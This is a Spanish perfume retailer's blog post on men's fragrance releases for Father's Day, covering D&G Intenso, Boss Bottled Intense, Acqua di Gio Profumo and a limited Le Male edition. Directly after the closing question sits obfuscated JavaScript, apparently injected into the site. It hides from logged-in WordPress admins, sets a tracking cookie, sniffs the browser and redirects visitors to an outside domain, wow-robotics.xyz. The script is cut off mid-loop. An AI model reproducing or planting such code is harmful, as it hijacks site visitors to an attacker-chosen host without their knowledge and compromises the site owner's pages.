perfumes baratos onlineHace unas semanas veníamos con las novedades en perfumes de mujer que se presentan para esta primavera. Hoy le toca el turno a ellos, cuando mejor que cuando se acerca el día del Padre para conocer las novedades en perfumes de hombre.

Dolce&Gabbana nos presenta el nuevo perfume para hombre Intenso, el primer perfume del actor Colin Farrel como imagen de la marca. Es la fuerza de un hombre con carácter, con el corazón anclado en la tradición pero que disfruta del mundo moderno.

perfumes de hombre online

 

 

 

 

 

 

 

 

 

 

 

Notas acuáticas y toques verdosos de albahaca como notas de salida. La sensación de frescura se complementa con notas de geranio y caléndula. Como notas de corazón: lavanda y tabaco que se acentúa con las suaves y secas notas de heno y trigo. Las notas de salvia y flor de ciprés consiguen una esencia pura y elegante. En sus notas de salida encontramos un toque Moepel aportando carácter, envolviéndola con lujosos toques florales, balsámicos y de miel.

La casa Hugo Boss rediseña su clásico Boss Botled con su versión más intensa y nos presenta Boss Botled Intense. Este nuevo perfume de hombre es amaderado y ligeramente especiado.

perfumes de hombre online

 

 

 

 

 

 

 

 

 

 

 

Entre sus notas de salida encontramos: manzana, flor de azahar del naranjo y bergamota; como notas de corazón: geranio, canela y clavos de olor.

Finalizando con unas notas de salida de sándalo, cedro, vetiver y vainilla. Os recomendamos acercaros a nuestras perfumerías y olerlo no tiene desperdicio.

Seguimos con una edición limitada especial de un clásico y en este caso también se trata de una versión más intensa de su hermano mayor. Giorgio Armani nos presenta Acqua di Gio Profumo como os adelantábamos una versión especial más intensa.

perfumes de hombre online

 

 

 

 

 

 

 

 

 

 

 

En su aroma encontramos como notas de salida notas marinas convirtiéndola en una fragancia acuática junto con la bergamota. Profundizando en sus notas de corazón notas florales de geranio, romero y salvia. Para acabar con unas notas de pachulí e incienso.

Cuando os hablábamos de las novedades en perfumes de mujer os comentábamos que Jean Paul Gaultier había lanzado la versión más pirata de sus clásicos Le Male y Le Classique. Hoy toca mostraros la edición limitada pirata de Le Male.

perfumes de hombre online

 

 

 

 

 

 

 

 

 

 

 

 

¿Cómo huele? A menta, con sus matices de lavanda y su toque de maderas suavizando la vainilla, de ‘Le Male’. No pierdas la oportunidad de probarlo, recuerda que es una edición limitada.

¿Qué os parecen? ¿Verdad que cualquiera de ellos es el regalo perfecto para el Día del Padre? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone